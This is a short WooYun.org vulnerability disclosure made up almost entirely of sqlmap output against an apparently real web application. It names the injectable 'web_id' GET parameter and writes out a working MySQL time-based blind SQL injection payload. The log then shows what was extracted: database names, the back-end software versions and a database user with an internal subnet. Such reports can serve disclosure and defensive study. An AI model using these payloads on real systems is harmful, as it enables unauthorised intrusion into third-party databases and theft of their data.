WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: web_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: channel=20016&web_id=2303663 AND (SELECT * FROM (SELECT(SLEEP(5)))GyUZ)&kind=1
---
[14:14:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL 5.0.12
[14:14:05] [INFO] fetching database names
[14:14:05] [INFO] fetching number of databases
[14:14:05] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[14:14:05] [WARNING] time-based comparison requires larger statistical model, please wait..............................             
[14:14:07] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential 
errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
2
[14:14:21] [INFO] retrieved: 
[14:14:27] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[14:15:45] [INFO] retrieved: click91
available databases [2]:
[*] click91
[*] information_schema

[14:17:01] [INFO] retrieved: 
[14:17:11] [INFO] adjusting time delay to 2 seconds due to good response times
'click91'@'192.168.33.0/255.255.255.0'
database management system users [1]:
[*] 'click91'@'192.168.33.0/255.255.255.0'